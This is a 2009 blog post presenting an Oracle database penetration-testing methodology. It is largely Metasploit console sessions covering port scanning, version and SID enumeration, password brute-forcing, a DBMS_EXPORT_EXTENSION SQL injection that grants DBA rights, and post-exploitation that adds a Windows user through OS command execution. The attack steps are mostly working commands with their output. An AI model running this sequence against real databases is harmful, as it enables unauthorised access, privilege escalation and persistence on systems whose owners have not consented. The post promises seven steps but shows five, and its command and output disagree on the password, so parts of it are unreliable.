Thursday, September 10, 2009

Oracle Security Assessment: The Open Source Approach

For the couple of years, number of Oracle vulnerabilities and exploits have been discovered in no order of standard methodology or appropriate guidelines. Moreover, there is no publicly available PenTesting Framework to check in-built packages for input validation attacks resulting in privilege escalation and data extraction. In this article, I will present the Oracle Pentesting Methodology in seven unique steps.

1. Discovery
Port Scanning for Oracle services can be done by using a simple Nmap tool. Oracle default ports are different for different products. But the main "Oracle TNS Listener" will always be using the range of 1521-1540 unless not changed.
For more information on ports used by Oracle, please visit:
http://www.red-database-security.com/whitepaper/oracle_default_ports.html

bt#: nmap -sV 192.168.0.100-105 -p 1521
Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-18 15:25 EDT
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener
Interesting ports on 192.168.0.101:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)

2. Version Enumeration/Fingerprinting
In order to know the exact version of "TNS Listener", we will use Metasploit auxiliary:
msf auxiliary(tnslsnr_version) > info
Name: Oracle tnslsnr Service Version Query.
Version: 6479
License: Metasploit Framework License (BSD)
Provided by: CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the tnslsnr service for the Oracle build.

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.100
RHOSTS => 192.168.0.100
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.103
RHOSTS => 192.168.0.103
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
[*] Auxiliary module execution completed

Now if we want to enumerate the "Oracle SID" for newer versions after 9.2.0.8, we have to put guess or bruteforce it.

[*] Host 192.168.0.105 is running: 32-bit Windows: Version 9.2.0.1.0 – Production
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) set RHOSTS 192.168.0.105
RHOSTS => 192.168.0.105
msf auxiliary(sid_enum) > run
[*] Identified SID for 192.168.0.105: PLSExtProc
[*] Identified SID for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: PLSExtProc
[*] Identified SERVICE_NAME for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: cyxtXDB
[*] Auxiliary module execution completed

Bruteforce Method

msf auxiliary(sid_brute) > run
[*] Starting brute force on 192.168.0.103, using sids
from /home/bt/msf3/dev/data/exploits/sid.txt...
[*] Found SID 'ORCL' for host 192.168.0.103
[*] Auxiliary module execution completed

Apart from guessing and bruteforcing, we can also use different Oracle components to determine the SID. Such as, oracle servlets and web applications.


3. Bruteforce Attack
Using a standard or extended password list, one can bruteforce various combinations of usernames and passwords.
msf auxiliary(brute_login) > run

[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Auxiliary module execution completed
msf auxiliary(brute_login) > db_notes
[*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109
type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER


4. Injection Attack & Privilege Exploitation

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info
Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$
Provided by: MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SQL GRANT DBA TO SCOTT yes no SQL to run.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKY
SID => UNLUCKY
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

msf auxiliary(oracle_sql) > set SQL select * from user_role_privs
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*]SCOTT,DBA,NO,YES,NO<--New Privileges :-) [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed msf auxiliary(oracle_sql) >


5. Post Exploitation

msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd /add“
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(win32exec) > run
[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dba P@ssW0rd /add‘
[*] Done...
[*] Auxiliary module execution completed

These set of steps give us a clear view of exploiting the Oracle infrastucture following similar or other modified Penetration Testing methodology. Thus, it is quite important for security professionals to understand and correlate the ideal testing methods to derive the requirements for Oracle platform security.